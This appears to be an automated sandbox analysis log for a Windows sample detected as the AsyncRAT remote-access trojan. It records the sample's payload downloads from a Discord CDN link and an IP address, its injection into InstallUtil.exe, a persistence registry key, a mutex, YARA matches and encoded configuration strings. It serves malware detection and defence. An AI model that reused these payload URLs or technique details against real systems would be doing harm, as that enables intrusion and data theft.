                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: aQKifdER74.exe, 00000000.00000002.702363399.0000000002C51000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: aQKifdER74.exeString found in binary or memory: https://cdn.discordapp.com/attachments/889935662827044904/889981640498090054/runpe.pdf
                      Source: aQKifdER74.exe, 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.comx
                      Source: InstallUtil.exe, 00000005.00000002.889863882.0000000007340000.00000004.00020000.sdmpString found in binary or memory: https://system.data.sqlite.org/
                      Source: InstallUtil.exe, 00000005.00000002.889863882.0000000007340000.00000004.00020000.sdmpString found in binary or memory: https://system.data.sqlite.org/X
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/icon/b.exe HTTP/1.1Host: 5.230.68.154Connection: Keep-Alive

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c8fe7e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702559639.0000000002DCB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aQKifdER74.exe PID: 1172, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6432, type: MEMORYSTR
                      Source: aQKifdER74.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\aQKifdER74.exeCode function: 0_2_00007FFA35DC158B0_2_00007FFA35DC158B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00EED5F05_2_00EED5F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00EE95305_2_00EE9530
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00EE8C605_2_00EE8C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00EEF2985_2_00EEF298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00EE89185_2_00EE8918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_011D44785_2_011D4478
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_011D41E75_2_011D41E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_011D42085_2_011D4208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_011D446F5_2_011D446F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A29B205_2_06A29B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A298B05_2_06A298B0
                      Source: aQKifdER74.exe, 00000000.00000002.702419728.0000000002CC7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameediskcz.dll0 vs aQKifdER74.exe
                      Source: aQKifdER74.exe, 00000000.00000002.701944483.0000000000E0D000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs aQKifdER74.exe
                      Source: aQKifdER74.exe, 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStub.exe" vs aQKifdER74.exe
                      Source: aQKifdER74.exe, 00000000.00000002.701747796.0000000000936000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLOVEBILLION$$$$$$$.exe4 vs aQKifdER74.exe
                      Source: aQKifdER74.exeBinary or memory string: OriginalFilenameLOVEBILLION$$$$$$$.exe4 vs aQKifdER74.exe
                      Source: C:\Users\user\Desktop\aQKifdER74.exeSection loaded: mscorjit.dllJump to behavior
                      Source: aQKifdER74.exeMetadefender: Detection: 22%
                      Source: aQKifdER74.exeReversingLabs: Detection: 53%
                      Source: aQKifdER74.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\aQKifdER74.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\aQKifdER74.exe 'C:\Users\user\Desktop\aQKifdER74.exe'
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat''
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat''Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aQKifdER74.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC472.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/6@1/4
                      Source: C:\Users\user\Desktop\aQKifdER74.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: 5.2.InstallUtil.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: 'yLVW8Izv5kVG1sZRwGB8+cp7lhdnCaFW/vdsZQIBU3H4EBtIwTBXncVNXe1g06PMXftCevNIG1QUl0oCGWLcww==', 'pl1rwiUkTY3MOmRAORn2jOGelKrOJoDl68bpUizmUYHGaI1ISEH2UFtyYywGPhIVpqjV48/YSpfxWygzWoCeog==', 'jg6Y+iOfRZoN5b583r5hyNx9aNyZH8VNV0tU2S2g6UvS+z1+3miF8FMXpjaPnd9V29yze99mkuEku+KlcDE25w==', 'tQat+WCkC1HDM1FNnqTNGs4B6+iHt+0TZuc20cDmtRDwTdeCiPyatLUvwUEnjUltmoNIaIWgRU3BxFNzHvAghCh3eX1UpgamjizFOfRlh4Ze5X4GcydN05Gmew68QMgKgIkIH4+CUU9Qq6f8qXHPF4V2Z5CjjlZ/m5tjFvia1UKKfzBktZPkUUDJ8xPfxfK/EgtpypI8TRd9wUvAqcPPC71EHCN9n8eZ6IcQTiIbBBsbPu5vDh0g2BJQk0OO9OvnkDngV+eD73V6BMH+mxPDwYS+Pv7/ihHHacAmAtMTjtcixoKbXNZhpE9MrnH1k0fl7Pz3k6V8ggdFKxccNh1HYizjYl1owi3KUA2ooiAdkBWY1CM+QY0z0u26svULR023I9FQRKpHa4FKHjF67MNiE7PUHOMm9cTCKti7SSuufi2eD69bKQN1FZvhz86ZITdun8U0kbRrRT84cRsiDSHZmhKnEfjgeBnNWYXdIgRDpULkN1H9FH9LZ5Np7f53k2EgV6f/+ZgygUtEwqxKurLcgwI6q5KlAiRkcU9mhxa8GGIcDau37Q26G83qKQ6BE+lrJktsjDQB1lVYzrIkXh6lstmI7L51ARiqmWWzqg+b4UxkG50zpQsIhiozXy8GEFzHd40/cf5akCzAt9R2xzA/mIkGExu9DdchY9UNwbJ7YYg3Pud1HBu50nK1BMfxAHdoJhk4DuQR4YjcOPT5YMPFhW0FxPkSx99pbgNKd82vckmDB9MDKj5OIXItifuPU5Jei2SSyGUMQGARAfHkOa/keiHs/5gAkaQVZF+q8pX4X1Yrl+AGvMUXD5/JuvGgSTvb7FMgU2qj+0rNbJ262/Iuhkt7V8eNzD+FOuHhHb3I0PxY08vkBQSqylRjzTe/FIx4oj02SkxLl1UyE7CKKk+8zdXjtEENK+kITvEGzfgYfK9ybT8ZhioKuId0h+8bhHc58TznH8kGePr9c7Qmf+2yOQ==', 'gxKyd2k85CtLmIzqjeV1tSZ8gmovFRvml0vf2GRm0Y7fzm5kfI3k93q6J+0iSUOwNq24kph0oy0ScDZjFC3ghA==', 'UOTNDG0pRW/uSzoFpTPh8s8IFU7dDmWHeSDWddLAa1S4Lhp3CuB25F3LrkKDYE8FyJRPdp2xxAovgahLTgSowA=='
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_01
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat''
                      Source: C:\Users\user\Desktop\aQKifdER74.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: aQKifdER74.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: aQKifdER74.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: aQKifdER74.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmp
                      Source: Binary string: ediskcz.pdb source: aQKifdER74.exe, 00000000.00000002.705051355.0000000012CC1000.00000004.00000001.sdmp
                      Source: Binary string: c:\Users\Administrator\Desktop\CRYPTED FILES\LOVEBILLION$$$$$$$.pdb source: aQKifdER74.exe
                      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmp
                      Source: Binary string: ediskcz.pdbh; source: aQKifdER74.exe, 00000000.00000002.705051355.0000000012CC1000.00000004.00000001.sdmp
                      Source: Binary string: c:\dev\sqlite\dotnet\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: InstallUtil.exe, 00000005.00000002.889863882.0000000007340000.00000004.00020000.sdmp

                      Data Obfuscation:

                      barindex
                      Yara detected Costura Assembly LoaderShow sources
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.6b30000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.6b30000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.884796919.0000000002E7F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.889162579.0000000006B30000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6432, type: MEMORYSTR
                      .NET source code contains potential unpackerShow sources
                      Source: aQKifdER74.exe, kurnaz/Form.cs.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.InstallUtil.exe.400000.0.unpack, Client/Handle_Packet/Packet.cs.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\aQKifdER74.exeCode function: 0_2_00007FFA35DC1538 pushfd ; retf 0_2_00007FFA35DC1542
                      Source: C:\Users\user\Desktop\aQKifdER74.exeCode function: 0_2_00007FFA35DC2D30 push ecx; retf 0_2_00007FFA35DC2D3C
                      Source: C:\Users\user\Desktop\aQKifdER74.exeCode function: 0_2_00007FFA35DC00A8 pushad ; retf 0_2_00007FFA35DC012A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06A223C0 push E8FFFFFFh; retf 5_2_06A223C5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                      Boot Survival:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c8fe7e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702559639.0000000002DCB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aQKifdER74.exe PID: 1172, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6432, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value created or modified: HKEY_CURRENT_USER\Software\ABA93A44164F2A09ACAF 405813D04B53574AB8C9721795E9FD705273487C852B7F4545FB875DA09C7350Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
